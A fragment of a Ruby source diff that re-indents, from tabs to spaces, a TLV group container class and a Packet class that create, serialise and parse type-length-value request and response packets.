-			tlv.from_r(raw[offset..offset+length])
-
-			# Insert it into the list of TLVs
-			tlvs << tlv
-
-			# Move up
-			offset += length
-		end
-	end
+  attr_accessor :tlvs
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  #
+  # Initializes the group TLV container to the supplied type
+  # and creates an empty TLV array.
+  #
+  def initialize(type)
+    super(type)
+
+    self.tlvs = [ ]
+  end
+
+  ##
+  #
+  # Group-based TLV accessors
+  #
+  ##
+
+  #
+  # Enumerates TLVs of the supplied type.
+  #
+  def each(type = TLV_TYPE_ANY, &block)
+    get_tlvs(type).each(&block)
+  end
+
+  #
+  # Synonym for each.
+  #
+  def each_tlv(type = TLV_TYPE_ANY, &block)
+    each(type, &block)
+  end
+
+  #
+  # Enumerates TLVs of a supplied type with indexes.
+  #
+  def each_with_index(type = TLV_TYPE_ANY, &block)
+    get_tlvs(type).each_with_index(&block)
+  end
+
+  #
+  # Synonym for each_with_index.
+  #
+  def each_tlv_with_index(type = TLV_TYPE_ANY, &block)
+    each_with_index(type, block)
+  end
+
+  #
+  # Returns an array of TLVs for the given type.
+  #
+  def get_tlvs(type)
+    if (type == TLV_TYPE_ANY)
+      return self.tlvs
+    else
+      type_tlvs = []
+
+      self.tlvs.each() { |tlv|
+        if (tlv.type?(type))
+          type_tlvs << tlv
+        end
+      }
+
+      return type_tlvs
+    end
+  end
+
+  ##
+  #
+  # TLV management
+  #
+  ##
+
+  #
+  # Adds a TLV of a given type and value.
+  #
+  def add_tlv(type, value = nil, replace = false, compress=false)
+
+    # If we should replace any TLVs with the same type...remove them first
+    if (replace)
+      each(type) { |tlv|
+        if (tlv.type == type)
+          self.tlvs.delete(tlv)
+        end
+      }
+    end
+
+    if (type & TLV_META_TYPE_GROUP == TLV_META_TYPE_GROUP)
+      tlv = GroupTlv.new(type)
+    else
+      tlv = Tlv.new(type, value, compress)
+    end
+
+    self.tlvs << tlv
+
+    return tlv
+  end
+
+  #
+  # Adds zero or more TLVs to the packet.
+  #
+  def add_tlvs(tlvs)
+    if (tlvs != nil)
+      tlvs.each { |tlv|
+        add_tlv(tlv['type'], tlv['value'])
+      }
+    end
+  end
+
+  #
+  # Gets the first TLV of a given type.
+  #
+  def get_tlv(type, index = 0)
+    type_tlvs = get_tlvs(type)
+
+    if (type_tlvs.length > index)
+      return type_tlvs[index]
+    end
+
+    return nil
+  end
+
+  #
+  # Returns the value of a TLV if it exists, otherwise nil.
+  #
+  def get_tlv_value(type, index = 0)
+    tlv = get_tlv(type, index)
+
+    return (tlv != nil) ? tlv.value : nil
+  end
+
+  #
+  # Returns an array of values for all tlvs of type type.
+  #
+  def get_tlv_values(type)
+    get_tlvs(type).collect { |a| a.value }
+  end
+
+  #
+  # Checks to see if the container has a TLV of a given type.
+  #
+  def has_tlv?(type)
+    return get_tlv(type) != nil
+  end
+
+  #
+  # Zeros out the array of TLVs.
+  #
+  def reset
+    self.tlvs = []
+  end
+
+  ##
+  #
+  # Serializers
+  #
+  ##
+
+  #
+  # Converts all of the TLVs in the TLV array to raw and prefixes them
+  # with a container TLV of this instance's TLV type.
+  #
+  def to_r
+    raw = ''
+
+    self.each() { |tlv|
+      raw << tlv.to_r
+    }
+
+    return [raw.length + 8, self.type].pack("NN") + raw
+  end
+
+  #
+  # Converts the TLV group container from raw to all of the individual
+  # TLVs.
+  #
+  def from_r(raw)
+    offset = 8
+
+    # Reset the TLVs array
+    self.tlvs = []
+    self.type = raw.unpack("NN")[1]
+
+    # Enumerate all of the TLVs
+    while (offset < raw.length-1)
+
+      tlv = nil
+
+      # Get the length and type
+      length, type = raw[offset..offset+8].unpack("NN")
+
+      if (type & TLV_META_TYPE_GROUP == TLV_META_TYPE_GROUP)
+        tlv = GroupTlv.new(type)
+      else
+        tlv = Tlv.new(type)
+      end
+
+      tlv.from_r(raw[offset..offset+length])
+
+      # Insert it into the list of TLVs
+      tlvs << tlv
+
+      # Move up
+      offset += length
+    end
+  end
 
 end
 
@@ -570,139 +569,139 @@ end
 #
 ###
 class Packet < GroupTlv
-	attr_accessor :created_at
-
-	##
-	#
-	# Factory
-	#
-	##
-
-	#
-	# Creates a request with the supplied method.
-	#
-	def Packet.create_request(method = nil)
-		return Packet.new(PACKET_TYPE_REQUEST, method)
-	end
-
-	#
-	# Creates a response to a request if one is provided.
-	#
-	def Packet.create_response(request = nil)
-		response_type = PACKET_TYPE_RESPONSE
-		method = nil
-
-		if (request)
-			if (request.type?(PACKET_TYPE_PLAIN_REQUEST))
-				response_type = PACKET_TYPE_PLAIN_RESPONSE
-			end
-
-			method = request.method
-		end
-
-		return Packet.new(response_type, method)
-	end
-
-	##
-	#
-	# Constructor
-	#
-	##
-
-	#
-	# Initializes the packet to the supplied packet type and method,
-	# if any.  If the packet is a request, a request identifier is
-	# created.
-	#
-	def initialize(type = nil, method = nil)
-		super(type)
-
-		if (method)
-			self.method = method
-		end
-
-		self.created_at = ::Time.now
-
-		# If it's a request, generate a random request identifier
-		if ((type == PACKET_TYPE_REQUEST) ||
-		    (type == PACKET_TYPE_PLAIN_REQUEST))
-			rid = ''
-
-			32.times { |val| rid << rand(10).to_s }
-
-			add_tlv(TLV_TYPE_REQUEST_ID, rid)
-		end
-	end
-
-	##
-	#
-	# Conditionals
-	#
-	##
-
-	#
-	# Checks to see if the packet is a response.
-	#
-	def response?
-		return ((self.type == PACKET_TYPE_RESPONSE) ||
-		        (self.type == PACKET_TYPE_PLAIN_RESPONSE))
-	end
-
-	##
-	#
-	# Accessors
-	#
-	##
-
-	#
-	# Checks to see if the packet's method is equal to the supplied method.
-	#
-	def method?(method)
-		return (get_tlv_value(TLV_TYPE_METHOD) == method)
-	end
-
-	#
-	# Sets the packet's method TLV to the method supplied.
-	#
-	def method=(method)
-		add_tlv(TLV_TYPE_METHOD, method, true)
-	end
-
-	#
-	# Returns the value of the packet's method TLV.
-	#
-	def method
-		return get_tlv_value(TLV_TYPE_METHOD)
-	end
-
-	#
-	# Checks to see if the packet's result value is equal to the supplied
-	# result.
-	#
-	def result?(result)
-		return (get_tlv_value(TLV_TYPE_RESULT) == result)
-	end
-
-	#
-	# Sets the packet's result TLV.
-	#
-	def result=(result)
-		add_tlv(TLV_TYPE_RESULT, result, true)
-	end
-
-	#
-	# Gets the value of the packet's result TLV.
-	#
-	def result
-		return get_tlv_value(TLV_TYPE_RESULT)
-	end
-
-	#
-	# Gets the value of the packet's request identifier TLV.
-	#
-	def rid
-		return get_tlv_value(TLV_TYPE_REQUEST_ID)
-	end
+  attr_accessor :created_at
+
+  ##
+  #
+  # Factory
+  #
+  ##
+
+  #
+  # Creates a request with the supplied method.
+  #
+  def Packet.create_request(method = nil)
+    return Packet.new(PACKET_TYPE_REQUEST, method)
+  end
+
+  #
+  # Creates a response to a request if one is provided.
+  #
+  def Packet.create_response(request = nil)
+    response_type = PACKET_TYPE_RESPONSE
+    method = nil
+
+    if (request)
+      if (request.type?(PACKET_TYPE_PLAIN_REQUEST))
+        response_type = PACKET_TYPE_PLAIN_RESPONSE
+      end
+
+      method = request.method
+    end
+
+    return Packet.new(response_type, method)
+  end
+
+  ##
+  #
+  # Constructor
+  #
+  ##
+
+  #
+  # Initializes the packet to the supplied packet type and method,
+  # if any.  If the packet is a request, a request identifier is
+  # created.
+  #
+  def initialize(type = nil, method = nil)
+    super(type)
+
+    if (method)
+      self.method = method
+    end
+
+    self.created_at = ::Time.now
+
+    # If it's a request, generate a random request identifier
+    if ((type == PACKET_TYPE_REQUEST) ||
+        (type == PACKET_TYPE_PLAIN_REQUEST))
+      rid = ''
+
+      32.times { |val| rid << rand(10).to_s }
+
+      add_tlv(TLV_TYPE_REQUEST_ID, rid)
+    end
+  end
+
+  ##
+  #
+  # Conditionals
+  #
+  ##
+
+  #
+  # Checks to see if the packet is a response.
+  #
+  def response?
+    return ((self.type == PACKET_TYPE_RESPONSE) ||
+            (self.type == PACKET_TYPE_PLAIN_RESPONSE))
+  end
+
+  ##
+  #
+  # Accessors
+  #
+  ##
+
+  #
+  # Checks to see if the packet's method is equal to the supplied method.
+  #
+  def method?(method)
+    return (get_tlv_value(TLV_TYPE_METHOD) == method)
+  end
+
+  #
+  # Sets the packet's method TLV to the method supplied.
+  #
+  def method=(method)
+    add_tlv(TLV_TYPE_METHOD, method, true)
+  end
+
+  #
+  # Returns the value of the packet's method TLV.
+  #
+  def method
+    return get_tlv_value(TLV_TYPE_METHOD)
+  end
+
+  #
+  # Checks to see if the packet's result value is equal to the supplied
+  # result.
+  #
+  def result?(result)
+    return (get_tlv_value(TLV_TYPE_RESULT) == result)
+  end
+
+  #
+  # Sets the packet's result TLV.
+  #
+  def result=(result)
+    add_tlv(TLV_TYPE_RESULT, result, true)
+  end
+
+  #
+  # Gets the value of the packet's result TLV.
+  #
+  def result
+    return get_tlv_value(TLV_TYPE_RESULT)
+  end
+
+  #
+  # Gets the value of the packet's request identifier TLV.
+  #
+  def rid
+    return get_tlv_value(TLV_TYPE_REQUEST_ID)
+  end
 end